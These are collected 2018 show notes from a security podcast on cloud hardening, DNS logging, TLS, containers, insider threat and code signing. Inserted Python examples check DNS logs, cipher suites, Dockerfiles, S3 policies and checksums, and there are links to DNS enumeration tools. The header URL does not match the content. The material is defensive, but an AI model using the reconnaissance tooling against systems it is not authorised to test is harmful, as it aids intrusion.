https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
Published on: July 27, 2018
Sorry, this week's show took an odd turn, and we don't have much in the way of show notes... Ms. Berlin is recovering from knee surgery, and we wish her a speedy recovery.
Bryan B. got back from BsidesSPFD, MO this week, after what was a well-received talk on building community. Lots of other excellent talks from speakers like Ms. Sunny Wear, and an impromptu panel with Ben Miller and a whole host of others, including:
@icssec
@bethayoung
@ViciousData
@killianditch
@fang0654
@SunnyWear
@awsmhacks
@sysopfb
@killamjr
We started talking about malware and ended up discussing a new channel in the BrakeSec Slack on #threatHunting. It appears there's a lot of information out there on the topic, so much so that SANS is having a whole conference around it.
https://www.sans.org/event/threat-hunting-and-incident-response-summit-2018
@icssec
@bethayoung
@bryanbrake
@ViciousData
@killianditch
@fang0654
@SunnyWear
@awsmhacks
@sysopfb
@killamjr
Ben Caudill @rhinosecurity
Spencer Gietzen @spengietz
Rhino Security - https://rhinosecuritylabs.com/blog/
AWS escalation and mitigation blog - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
What is the difference between this and something like Scout or Lynis?
Is it a forensic or IR tool?
How might offensive people use this tool? What is possible when you’re using this as a ‘redteam’ or ‘pentesting’ tool?
S3 bucket perms?
Security Group policy fails
Some of the hardening policies for Security groups?
RDS?
Where are you speaking… BSLV? DefCon?
https://aws.amazon.com/whitepapers/aws-security-best-practices/
https://d1.awsstatic.com/whitepapers/AWS_Cloud_Best_Practices.pdf
https://aws.amazon.com/whitepapers/
https://aws.amazon.com/blogs/security/how-to-enable-mfa-protection-on-your-aws-api-calls/
Slack
Patreon
Bsides Springfield
Published on: July 11, 2018
Raymond Evans - CTF organizer for nolacon and Founder of CyDefe Labs
@cydefe
BrakeSec DerbyCon
@dragosinc dragos.com
DNS Enumeration:
DNS Tools:
https://tools.kali.org/information-gathering/theharvester
DNS Tutorial
https://www.youtube.com/watch?v=4ZtFk2dtqv0 (A cat explains DNS)
https://pentestlab.blog/tag/dns-enumeration/
DNS
Logging detailed DNS queries and responses can be beneficial for many reasons. The first and most obvious is to aid in incident response. DNS logs can be very helpful for tracking down malicious behavior, especially on endpoints in a DHCP pool. If an alert is received with a specific IP address, that IP address may not be on the same endpoint by the time someone ends up investigating. Not only does that waste time, it also gives the malicious program or attacker more time to hide or spread to other machines.
DNS logging is also useful for tracking down other compromised hosts, downloads from malicious websites, and malware that uses Domain Generation Algorithms (DGAs) to mask malicious behavior and evade detection.
NOTE: However if a Microsoft DNS solution (prior to server 2012) is in use, according to Microsoft, “Debug logging can be resource intensive, affecting overall server performance and consuming disk space. Therefore, it should only be used temporarily when more detailed information about server performance is needed.” From Server 2012 forward DNS analytic logging is much less resource intensive. If the organization is using BIND or some DNS appliance, it should have the capability to log all information about DNS requests and replies.
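As an added illustration of the DHCP-pool problem and the DGA point above (this is not from the show notes or any tool mentioned there): a few constructed BIND-style query log lines and a made-up DHCP lease table, with a crude entropy-based DGA heuristic, showing that the query must be attributed to whoever held the IP at query time rather than whoever holds it now. Log format, lease data, hostnames and thresholds are all assumptions made for the example.

```python
import math
import re
from collections import Counter
from datetime import datetime

# Constructed BIND-style query log lines (made up for this example): the
# same DHCP address, 10.0.5.23, appears before and after a lease change.
DNS_LOG = """\
29-Jun-2018 09:14:02.101 client 10.0.5.23#51234: query: update.microsoft.com IN A +
29-Jun-2018 09:15:10.447 client 10.0.5.23#51240: query: xk3p9qzv7lwm2b.net IN A +
29-Jun-2018 09:15:11.002 client 10.0.5.23#51241: query: qw8zr1tpx9vmdn.com IN A +
29-Jun-2018 11:40:33.910 client 10.0.5.23#50011: query: www.brakeingsecurity.com IN A +
"""

# Constructed DHCP lease history: (start, end, ip, hostname, mac). In a real
# environment this would come from the DHCP server's lease log.
DHCP_LEASES = [
    ("29-Jun-2018 08:00:00", "29-Jun-2018 10:00:00", "10.0.5.23", "LAPTOP-ALICE", "aa:bb:cc:00:00:01"),
    ("29-Jun-2018 10:30:00", "29-Jun-2018 14:00:00", "10.0.5.23", "LAPTOP-BOB", "aa:bb:cc:00:00:02"),
]

LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) client (?P<ip>[\d.]+)#\d+: query: (?P<name>\S+) IN ")
TS_FMT = "%d-%b-%Y %H:%M:%S"


def parse_ts(text):
    """Parse '29-Jun-2018 09:14:02.101' (fractional seconds optional)."""
    return datetime.strptime(text.split(".")[0], TS_FMT)


def parse_dns_log(text):
    """Return (timestamp, client_ip, queried_name) for each recognised line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append((parse_ts(m["ts"]), m["ip"], m["name"].rstrip(".")))
    return events


def host_for(ip, when, leases=DHCP_LEASES):
    """Return (hostname, mac) that held `ip` at time `when`, or None."""
    for start, end, lease_ip, host, mac in leases:
        if lease_ip == ip and parse_ts(start) <= when < parse_ts(end):
            return host, mac
    return None


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_dga(name, min_len=12, min_entropy=3.5, max_vowel_ratio=0.2):
    """Crude DGA heuristic: a long, high-entropy, vowel-poor second-level label.
    Thresholds are illustrative assumptions; tune them against your own traffic."""
    labels = name.lower().split(".")
    if len(labels) < 2 or not labels[-2]:
        return False
    sld = labels[-2]
    vowel_ratio = sum(ch in "aeiou" for ch in sld) / len(sld)
    return (len(sld) >= min_len and shannon_entropy(sld) >= min_entropy
            and vowel_ratio <= max_vowel_ratio)


def triage(log_text=DNS_LOG, leases=DHCP_LEASES):
    """Flag DGA-looking queries and attribute each to the endpoint that held
    the client IP at that moment, not the one holding it now."""
    findings = []
    for when, ip, name in parse_dns_log(log_text):
        if looks_like_dga(name):
            owner = host_for(ip, when, leases)
            findings.append({
                "time": when.isoformat(),
                "ip": ip,
                "name": name,
                "host": owner[0] if owner else "UNKNOWN",
                "mac": owner[1] if owner else None,
            })
    return findings


if __name__ == "__main__":
    for f in triage():
        print(f"{f['time']} {f['ip']} -> {f['host']} ({f['mac']}) queried {f['name']}")
    # By 11:40 the same IP belongs to a different machine:
    print("10.0.5.23 at 11:40 was", host_for("10.0.5.23", parse_ts("29-Jun-2018 11:40:33")))
```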
How difficult has that become with the advent of GDPR and whois record anonymization?
Published on: July 2, 2018
After the recent Tesla insider threat event, BrakeSec decided to discuss some of the indicators of insider threat, what can be done to mitigate it, and why it happens.
news stories referenced:
https://www.infosecurity-magazine.com/news/teslas-tough-lesson-on-malicious/
https://en.wikipedia.org/wiki/Insider_threat
https://en.wikipedia.org/wiki/Insider_threat_management
Published on: June 26, 2018
Area41 Zurich report
Book Club - 4th Tuesday of the month
https://www.owasp.org/images/d/d3/TLS_v1.3_Overview_OWASP_Final.pdf
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet
TLS_DHE_RSA_AES_256_GCM_SHA256
TLS = Protocol
DHE = Diffie-Hellman ephemeral (provides Perfect Forward Secrecy)
Perfect Forward Secrecy = session keys won’t be compromised, even if server private keys are
Past messages and data cannot be retrieved or decrypted (https://en.wikipedia.org/wiki/Forward_secrecy)
RSA = Digital Signature (authentication)
There are only 2 (RSA, or ECDSA)
AES_256_GCM - HMAC (hashed message authentication code)
https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet
https://en.wikipedia.org/wiki/HMAC#Definition_.28from_RFC_2104.29
https://en.wikipedia.org/wiki/Funicular
https://mozilla.github.io/server-side-tls/ssl-config-generator/?hsts=no
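An added example, not from the show notes or the OWASP cheat sheet linked above: a small parser that breaks an IANA-style cipher suite name into the parts listed above and rates it on forward secrecy and cipher mode. It accepts the name as written in the notes (without the WITH_ token) as well as the standard form; the classification tables and the verdict labels are my own assumptions.

```python
import re

# Assumed classifications, written for this example (not from the OWASP
# cheat sheet): key exchanges that give forward secrecy, AEAD cipher modes,
# and cipher tokens that mark a suite as legacy.
FORWARD_SECRET_KX = {"DHE", "ECDHE"}
AEAD_MODES = ("GCM", "CCM", "CHACHA20_POLY1305")
LEGACY_TOKENS = ("RC4", "3DES", "DES_", "NULL", "EXPORT")

# IANA-style name: TLS_[<kx>_]<auth>_[WITH_]<cipher>_<hash>. A bare "RSA"
# means RSA key transport, which does both key exchange and authentication.
SUITE_RE = re.compile(
    r"^TLS_(?:(?P<kx>ECDHE|DHE)_)?(?P<auth>RSA|ECDSA)_(?:WITH_)?(?P<rest>[A-Z0-9_]+)$"
)


def parse_cipher_suite(name):
    """Split a suite name into the parts the notes describe, or None if unparsable."""
    m = SUITE_RE.match(name.strip().upper())
    if not m:
        return None
    kx = m["kx"] or m["auth"]
    cipher, _, hash_alg = m["rest"].rpartition("_")
    return {
        "protocol": "TLS",
        "key_exchange": kx,
        "authentication": m["auth"],
        "cipher": cipher,
        # For AEAD suites the trailing hash is the handshake PRF hash; for
        # CBC suites it is the HMAC used for record integrity.
        "hash": hash_alg,
        "forward_secrecy": kx in FORWARD_SECRET_KX,
        "aead": any(mode in cipher for mode in AEAD_MODES),
        "legacy": any(tok in cipher for tok in LEGACY_TOKENS),
    }


def rate_cipher_suite(name):
    """Coarse verdict: 'recommended' (PFS + AEAD), 'acceptable' (PFS, CBC),
    'avoid' (no PFS or a legacy cipher), 'unknown' (could not parse)."""
    info = parse_cipher_suite(name)
    if info is None:
        return "unknown"
    if info["legacy"] or not info["forward_secrecy"]:
        return "avoid"
    return "recommended" if info["aead"] else "acceptable"


if __name__ == "__main__":
    for suite in ("TLS_DHE_RSA_AES_256_GCM_SHA256",
                  "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
                  "TLS_RSA_WITH_AES_128_CBC_SHA",
                  "TLS_RSA_WITH_3DES_EDE_CBC_SHA"):
        print(f"{suite}: {rate_cipher_suite(suite)} {parse_cipher_suite(suite)}")
```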
Published on: June 20, 2018
https://nostarch.com/packetanalysis3 -- Excellent Book! You must buy it.
DetSEC mention
ShowMe Con panel and keynote
SeaSec East standing room only. Crispin gave a great talk about running as a standard user
Bsides Cleveland -
https://www.passwordping.com/surprising-new-password-guidelines-nist/
1Password version 7.1 integrates with Troy Hunt's "Pwned Passwords" service to check for passwords that suck
https://twitter.com/troyhunt/status/1006266985808875521
https://1password.com/sign-up/
https://www.troyhunt.com/have-i-been-pwned-is-now-partnering-with-1password/
1,300 complaints of GDPR breaches in the first 6 days of enablement:
https://iapp.org/news/a/irish-dpc-received-1300-complaints-since-gdpr-implementation-date/
https://www.pcisecuritystandards.org/about_us/leadership
Ms. Berlin’s mega tweet on protecting your network
https://twitter.com/InfoSystir/status/1000109571598364672
Utica College CYB617
I tweeted “utica university” many pardons
Mr. Childress’ high school class
Laurens, South Carolina
Probably spent as much as a daily coffee at Starbucks… makes all the difference.
CTF Club, and book club (summer reading series)
Patreon
SeaSec East
Showmecon
Area41con
bsidescleveland
Here are 50 FREE things you can do to improve the security of most environments:
Segmentation/Networking:
Access control lists are your friend (deny all first)
Disable ports that are unused, & setup port security
DMZ behind separate firewall
Egress Filtering (should be just as strict as Ingress)
Geoblocking
Segment with Vlans
Restrict access to backups
Role based servers only! DNS servers/DCs are just that
Network device backups
Windows:
AD delegation of rights
Best practice GPO (NIST GPO templates)
Disable LLMNR/NetBios
EMET (when OSes prior to 10 are present)
Get rid of open shares
MSBSA
WSUS
** run as a standard user ** no ‘localadmin’
Endpoints:
App Whitelisting
Block browsing from servers. Not all machines need internet access
Change ilo settings/passwords
Use Bitlocker/encryption
Patch *nix boxes
Remove unneeded software
Upgrade firmware
MFA/Auth:
Diff. local admin passwords (LAPS) https://www.microsoft.com/en-us/download/details.aspx?id=46899
Setup centralized logins for network devices. Use TACACS+ or radius
Least privileges EVERYWHERE
Separation of rights - Domain Admin use should be sparse & audited
Logging Monitoring:
Force advanced file auditing (ransomware detection)
Log successful and unsuccessful logins - Windows/Linux logging cheatsheets
Web:
Fail2ban
For the love of god implement TLS 1.2/3
URLscan
Ensure web logins use HTTPS
Mod security
Other:
Block Dns zone transfers
Close open mail relays
Disable telnet & other insecure protocols or alert on use
DNS servers should not be openly recursive
Don't forget your printers (saved creds aren't good)
Locate and destroy plain text passwords
No open wi-fi, use WPA2 + AES
Password safes
IR:
Incident Response drills
Incident Response Runbook & Bugout bag
Incident Response tabletops
Purple Team:
Internal & OSINT honeypots
User Education exercises
MITRE ATT&CK Matrix is your friend
Vulnerability Scanner
Published on: June 6, 2018
Jack Rhysider
Ok I think these topics should keep us busy for a while. Topics for discussion:
Vuln mgmt tools CVE scores suck.
Threat modeling is good.
Forces you to know your environment
https://en.wikipedia.org/wiki/Kanban
https://blog.jeremiahgrossman.com/2018/05/all-these-vulnerabilities-rarely-matter.html
https://twitter.com/lnxdork/status/998559649271025664
https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://www.theregister.co.uk/2018/05/17/nethammer_second_remote_rowhammer_exploit/
Published on: May 23, 2018
Converge Detroit
Jack Rhysider- Podcaster, DarkNet Diaries
Published on: May 15, 2018
GDPR will affect any information system that processes or will process people… like it or not.
Derby Tickets
CTF and auction
Keynote
Converge Detroit
I’ll be at nolacon too
Boettcher
Recap BDIR #3
https://blog.netwrix.com/2018/05/01/five-reasons-to-ditch-manual-data-classification-methods/
https://blog.networksgroup.com/data-loss-prevention-fundamentals
Published on: May 7, 2018
Container security
Jay Beale @inguardians , @jaybeale
Containers
Difference between containers and sandboxing
Roll your own -
Containers
Using public registries - leave you vulnerable
Use your own private repos for deploying containers
Reduce attack surface
Reduce user access
Automation will allow more security to get baked in.
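The three points above (pull only from your own registry, shrink the attack surface, cut user access) can be enforced before an image is ever built, which is where the "baked in" security comes from. The linter below is an added example, not code from the show or from any project it mentions; the registry hostname, the placeholder digest and both Dockerfiles are constructed for illustration. It flags base images that are not pulled from your own registry or not pinned by digest, ADD instructions that fetch remote content, and a final stage that still runs as root (a USER in an earlier build stage does not carry over, so each FROM resets the check).

```python
"""Dockerfile linter for the container-hardening points above.
Added example; the registry name, digest and Dockerfiles are constructed."""
import re

PRIVATE_REGISTRY = "registry.internal.example"          # assumed: your own registry hostname
DIGEST = "sha256:" + "0123456789abcdef" * 4               # constructed placeholder, not a real digest

FROM_RE = re.compile(r"^FROM\s+(?:--platform=\S+\s+)?(\S+)(?:\s+AS\s+\S+)?$", re.I)
USER_RE = re.compile(r"^USER\s+(\S+)", re.I)
ADD_URL_RE = re.compile(r"^ADD\s+(?:--\S+\s+)*https?://", re.I)
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def lint_dockerfile(text, private_registry=PRIVATE_REGISTRY):
    """Return a list of findings; an empty list means the file passes these checks."""
    findings = []
    user = "root"                      # Docker's default when no USER instruction runs
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = FROM_RE.match(line)
        if m:
            image = m.group(1)
            user = "root"              # every stage starts over as root
            if image.lower() == "scratch":
                continue
            if not image.startswith(private_registry + "/"):
                findings.append(f"line {lineno}: base image {image} is not from {private_registry}")
            if not DIGEST_RE.search(image):
                findings.append(f"line {lineno}: base image {image} is not pinned by digest")
            continue
        if ADD_URL_RE.match(line):
            findings.append(f"line {lineno}: ADD fetches remote content; COPY a vetted artifact instead")
            continue
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
    if user.split(":")[0] in ("root", "0"):
        findings.append("final stage runs as root; add a USER instruction")
    return findings

# Constructed: the kind of Dockerfile the bullets above warn about.
WEAK = """\
FROM node:latest
ADD https://example.com/app.tar.gz /app/
RUN cd /app && npm install
CMD ["node", "/app/server.js"]
"""

# Constructed: same app, private base image pinned by digest, vetted source copied in, non-root user.
HARDENED = f"""\
FROM {PRIVATE_REGISTRY}/base/node:8.11@{DIGEST} AS build
COPY app/ /app/
RUN cd /app && npm install --production
FROM {PRIVATE_REGISTRY}/base/node:8.11@{DIGEST}
COPY --from=build /app /app
RUN adduser -D app
USER app
CMD ["node", "/app/server.js"]
"""

if __name__ == "__main__":
    for label, dockerfile in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, lint_dockerfile(dockerfile) or ["ok"])
```

Run it in CI against every Dockerfile in the repository and fail the build on a non-empty list; the digest check is what turns "use your own registry" into "use exactly the image we scanned".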
https://www.infoworld.com/article/3104030/security/5-keys-to-docker-container-security.html
https://blog.blackducksoftware.com/8-takeaways-nist-application-container-security-guide
https://www.vagrantup.com/downloads.html
https://www.vmware.com/products/thinapp.html
https://www.meetup.com/SEASec-East/events/249983387/
S3 buckets / Azure Blobs
https://docs.microsoft.com/en-us/azure/architecture/aws-professional/services
https://docs.aws.amazon.com/config/latest/developerguide/s3-bucket-policy.html
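A bucket policy can be checked offline before it is applied, which is the same pair of questions the AWS Config rule linked above keeps asking after the fact. The checker below is an added example, not code from the show or from AWS; both policy documents are constructed, and the account ID and role name in them are placeholders. It flags unconditional Allow statements granted to everyone ("Principal": "*" or {"AWS": "*"}) and the absence of a Deny keyed on aws:SecureTransport, which is the standard way to refuse plaintext HTTP to a bucket.

```python
"""Offline check of an S3 bucket policy for two common mistakes: Allow
statements granted to everyone, and no Deny for requests made without TLS.
Added example; both policies are constructed, the account ID and role name
are placeholders."""
import json

# Constructed: world-readable bucket, no TLS enforcement.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"}
    ]
})

# Constructed: one IAM role may read; anything over plaintext HTTP is denied.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AppRoleRead", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "DenyInsecureTransport", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*",
         "Resource": ["arn:aws:s3:::example-bucket",
                      "arn:aws:s3:::example-bucket/*"],
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}}
    ]
})

def _statements(policy_json):
    stmts = json.loads(policy_json).get("Statement", [])
    return stmts if isinstance(stmts, list) else [stmts]   # a lone statement may be a bare object

def _is_anonymous(principal):
    # "*" and {"AWS": "*"} both mean everyone, including unauthenticated callers.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False

def public_allow_sids(policy_json):
    """Sids of unconditional Allow statements granted to everyone."""
    return [s.get("Sid", "<no Sid>") for s in _statements(policy_json)
            if s.get("Effect") == "Allow"
            and _is_anonymous(s.get("Principal"))
            and not s.get("Condition")]

def enforces_tls(policy_json):
    """True if some Deny statement is keyed on aws:SecureTransport being false."""
    for s in _statements(policy_json):
        if s.get("Effect") != "Deny":
            continue
        bool_cond = s.get("Condition", {}).get("Bool", {})
        if str(bool_cond.get("aws:SecureTransport", "")).lower() == "false":
            return True
    return False

def findings(policy_json):
    """Human-readable list of problems; empty means both checks pass."""
    out = [f"statement {sid} grants access to everyone" for sid in public_allow_sids(policy_json)]
    if not enforces_tls(policy_json):
        out.append("no Deny for aws:SecureTransport=false (plaintext HTTP is allowed)")
    return out

if __name__ == "__main__":
    for label, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, findings(policy) or ["ok"])
```

Anonymous grants that carry a Condition (an aws:Referer check, say) are deliberately not flagged here so the check stays free of false positives; they deserve a manual look, since a Referer header is attacker-controlled. The bucket policy is also only one of the controls: ACLs and the account-level public-access block settings need their own check.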
Published on: April 29, 2018
Report from Bsides Nash - Ms. Berlin
New Job
Keynote at Bsides Springfield, MO
Mr. Boettcher talks about Sigma Malware infection.
http://www.securitybsides.com/w/page/116970567/BSidesSpfd
**new website upcoming**
Registration is coming and will be updated on next show (hopefully)
DBIR -https://www.verizonenterprise.com/resources/reports/rp_DBIR_2018_Report_execsummary_en_xg.pdf
VERIS framework
53,000 incidents
2,216 breaches?!
73% breaches were by outsiders
28% involved internal actors (but needs outside help?)
Not teaching “don’t click the link”, but instead teach, “I have no curiosity”
Discuss "Dir. Infosec" Slack story as method to halt infection
The “Living off the Land” trend continues with attack groups opting for tried-and-trusted means to infiltrate target organizations. Spear phishing is the number one infection vector employed by 71 percent of organized groups in 2017. The use of zero days continues to fall out of favor.
Offboarding people… there is so much process for getting people in, but the process for getting them out is just not mature...
Published on: April 20, 2018
Bryan plays 'stump the experts' with Ms. Berlin and Mr. Boettcher this week...
We discuss SIEM logging, and tuning...
How do SIEM deal with disparate log file types?
What logs should be the first to be gathered?
Is a SIEM even required, or is just a central log repo enough?
Which departments benefit the most from logging? (IT, IR, Compliance?)
Published on: April 11, 2018
Megan Roddie discusses being high-functioning autistic, and we discuss how companies and management can make the most of the unique abilities of those with high-functioning autism.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-011.mp3
Matt Miller's Assembly and Reverse Engineering Class:
Still can sign up! The syllabus is here: https://drive.google.com/open?id=1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0
SHOW NOTES:
Link to Megan’s slides
Megan Roddie (@megan_roddie)
Published on: April 4, 2018
Matt Miller’s #Assembly and #Reverse #Engineering class
$150 USD for each class, $250 USD for both classes
Syllabus : https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing
Please state which class you'd like to take when ordering in the "Notes" field in Paypal https://paypal.me/BDSPodcast/150usd
To sign up for both classes: https://paypal.me/BDSPodcast/250usd
Stories:
https://threatpost.com/orbitz-warns-880000-payment-cards-suspected-stolen/130601/
TLS1.3 - https://www.theregister.co.uk/2018/03/27/with_tls_13_signed_off_its_implementation_time/
https://timtaubert.de/blog/2015/11/more-privacy-less-latency-improved-handshakes-in-tls-13
Sign up for Jay Beale's class at Black Hat 2018: https://www.blackhat.com/us-18/training/aikido-on-the-command-line-linux-lockdown-and-proactive-security.html
Published on: March 27, 2018
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-009-internships-mentorships-retooling-finding-that-unicorn-pentester.mp3
Topics discussed:
SHOW NOTES:
Guests: Mr. Jay Beale
Guest: Mr. Brad Ammerman @?????????
Announcements:
RE/ASM class (Matt Miller)
SeaSec East Meetup at Black Lodge
Jay’s class at Black Hat
Slack channel
“M3atshield”
What jobs are good segues into either blue or red teams/pentesting?
SOC Analyst (network security, pcap, IR)
SysAdmin (obviously)
Code devs (audits, binary analysis, they know the code internals)
System architects (they know the nuts and bolts)
Security architects (segue to red team, they know how to defend, threat analysis)
Project management /management (client/customer facing, can understand the business side)
Journeyman pipelines vs. intern pipelines
Different than interns = Already highly skilled in ‘something’
Code devs
Physical security
audit/compliance
project/program management
System admin
Management
“generalist”
Retooling can be difficult
May be a paycut
Fear of failure
How do we alleviate that? (mentorship model?)
Companies looking for skilled people can’t look for what they want
Think in the bigger picture
Is not being able to see the value in a non-infosec person coming to the team a sign of immaturity in a company?
The phrase “must be able to hit the ground running”
Turn off for those wanting to make that change
Feel they must already know the job
People should be considered as like a block of clay, not an immutable stone.
People can change if they want to…
2 party comfort zone. Both the person changing role/title, and the company understanding where the person sits in the position.
mentorship/menteeship in an org
Published on: March 19, 2018
BDIR Episode - 001
Our guests will be:
Martin Brough - Manager of the Security Solutions Engineering team in the #email #phishing industry
Topic of the Day:
CREDENTIAL STEALING EMAILS WHAT CAN YOU DO
Show Notes:
More show notes at https://www.imfsecurity.com/podcasts/2018/2/28/bdir-podcast-episode-001
Published on: March 12, 2018
https://www.auditscripts.com/free-resources/critical-security-controls/
Thanks to Slacker Ben Chung, who heard about this from John Strand...
BsidesIndy report - Amanda
Bsides Austin - Brian
Log_MD 2.0 - www.log-md.com
https://itsfoss.com/kali-linux-debian-wsl/
Published on: March 12, 2018
Topics:
Link to secure framework document: https://drive.google.com/open?id=1xLfY4uI88K2AiA1mosWJ7jFyP100Jv5d
--Show Notes--
Announcements:
Matt Miller’s class on Assembly and Reverse engineering
Starts 2 April - 6 sessions
2nd Class - 6 sessions, beginning 21 May
Beginner course on Assembly
Advanced course, dealing with more advanced topics
$150 for each class, or a $250 deal if you sign up for both classes
paypal.me/BDSPodcast/150USD - Specify in the NOTES if you want the “Beginner” or “Advanced” course
paypal.me/BDSPodcast/250USD - If you want both courses
We need a minimum of 10 students per class
Projects:
Chromebook with Debian
Bit of a pain, if I could be honest..
Needed USB hub with eth0, and a USB soundcard
USB3 low profile thumbdrives would be better
https://www.amazon.com/gp/product/B01K5EBCES/ref=oh_aui_detailpage_o01_s00?ie=UTF8&psc=1
https://www.securecontrolsframework.com/ ←--well well worth the signup
https://drive.google.com/open?id=1xLfY4uI88K2AiA1mosWJ7jFyP100Jv5d - ‘secure.xlsx’
http://www.dummies.com/programming/certification/security-control-frameworks/
Numerous security frameworks already exist:
Cisco
NIST
COBIT
ITIL (can be utilized)
SWIFT https://www.accesspay.com/wp-content/uploads/2017/09/SWIFT_Customer_Security_Controls_Framework.pdf
“My weird path to #infosec” on twitter
https://en.wikipedia.org/wiki/Hydrocolloid_dressing
Published on: March 5, 2018
Topics on today's show:
NPM (Node Package Manager) - a pre-release version, when run with sudo, changed the ownership (and so the effective permissions) of /etc, /boot, and /usr, breaking many systems and requiring full re-installs. Why was it allowed to ship, and worse, why did so many people run that version on production systems?
Code signing - a well-known content management system does not sign its code. What are the risks of not signing code? We also talk about why you should verify code before you use it.
Using code without testing - NPM released a 'not ready for primetime' version of its package manager. We discuss the issues in running 'alpha' and 'beta' software.
SHOW NOTES:
Previous podcast referenced: http://traffic.libsyn.com/brakeingsecurity/2018-005-Securing_CMS_and_mobile_devices-phishing_story.mp3
NPM -
Using ‘pre-production’ software without testing is not advisable
Unfortunately, many assume all software is stable
A product of ‘devops’ - failing forward “we’ll just fix it in post”
Talked last podcast about ‘supply chain security’
https://givan.se/do-not-sudo-npm/
Developers can leave a project, leaving code unmaintained… or dependencies
Also, a modicum of trust is required… verifying the code before you use it.
Verification that the code came from where it was supposed to
Many important code bases aren’t signed or have verification
Wordpress does not appear to publish file hashes
Can you always trust the download? Sure, the site serves it over TLS… but TLS only protects the bytes in transit between you and that server. If the server or a mirror is handing out a modified file, nothing tells you: without a published hash there is no integrity check against what the author built, and without a signature there is no proof of origin or non-repudiation.
https://docs.microsoft.com/en-us/windows-hardware/drivers/dashboard/get-a-code-signing-certificate
https://www.thawte.com/code-signing/whitepaper/best-practices-for-code-signing-certificates.pdf
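To make the integrity point concrete, here is the checksum step that a publisher's SHA256SUMS file makes possible. It is an added example, not code from the show or from WordPress, and plays both sides with constructed in-memory byte strings: the publisher emits the checksum list, the consumer verifies what it actually downloaded, a file that was swapped on the mirror fails, and a file that was never published is reported as unlisted rather than silently accepted. A hash served from the same server as the download only catches corruption or a partial compromise; for origin authentication the list itself has to be signed with a key kept off that server, which is the code-signing step the two links above describe.

```python
"""Publisher-side SHA256SUMS generation and consumer-side verification, in the
sha256sum(1) layout ("<hex digest>  <file name>"). Added example; the files
are constructed in-memory byte strings, not real releases."""
import hashlib
import hmac

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def write_sums(files):
    """Publisher side: one line per file, as sha256sum(1) prints it."""
    return "".join(f"{sha256_hex(data)}  {name}\n" for name, data in sorted(files.items()))

def parse_sums(text):
    """Consumer side: {file name: expected hex digest}. Rejects malformed lines
    instead of silently skipping them."""
    expected = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64:
            raise ValueError(f"malformed checksum line {lineno}: {line!r}")
        digest, name = parts
        expected[name.lstrip("*")] = digest.lower()   # a leading '*' marks binary mode in sha256sum output
    return expected

def verify(downloaded, sums_text):
    """{file name: 'OK' | 'FAILED' | 'NOT LISTED'} for every downloaded file."""
    expected = parse_sums(sums_text)
    status = {}
    for name, data in downloaded.items():
        if name not in expected:
            status[name] = "NOT LISTED"        # no published digest: nothing to verify against
        elif hmac.compare_digest(sha256_hex(data), expected[name]):
            status[name] = "OK"
        else:
            status[name] = "FAILED"            # bytes differ from what the publisher hashed
    return status

# Constructed: what the publisher actually built and hashed ...
PUBLISHED = {
    "cms-release.zip": b"PK\x03\x04 legitimate release bytes",
    "plugin.zip": b"PK\x03\x04 plugin bytes",
}
SUMS = write_sums(PUBLISHED)

# ... and what the consumer got: one file swapped on the mirror, one never published.
DOWNLOADED = {
    "cms-release.zip": b"PK\x03\x04 legitimate release bytes",
    "plugin.zip": b"PK\x03\x04 plugin bytes plus a backdoor",
    "extra.zip": b"PK\x03\x04 never published",
}

if __name__ == "__main__":
    for name, result in verify(DOWNLOADED, SUMS).items():
        print(f"{result:10s} {name}")
```

The important design choice is that an unlisted file is its own status rather than a pass: a deployment script that treats "no digest found" as success has no integrity check at all.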
Bsides NASH-
https://bsidesnash.org/2018/02/20/interview-and-resume-workshop/
Published on: February 26, 2018
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-005-Securing_CMS_and_mobile_devices-phishing_story.mp3
Topics:
Discussion of Ms. Berlin's course
CAPEC discussion
RTF malware MS Office
A Phishing story...
Mobile Supply Chain Security
CMS Supply Chain Security
Ms. Berlin’s course - recap of 2nd session
Brakeing Down IR -date?
Any malware of note?
Upgrade your Office! The sample was an RTF file: double-clicking it never opened a document, the embedded script just ran.
Supply chain isn't just hardware… software stacks abound and nobody tracks them
WordPress plugins, CMS plugins/themes… not monitored, weakly secured
Keeping track is as important as asset management
Do you know what your CMS is running, plugin wise?
And if plugins aren’t bad enough, you have PHP to deal with
Suggestions:
Buy plugins - you get what you pay for
Check what support you get (always a good idea)
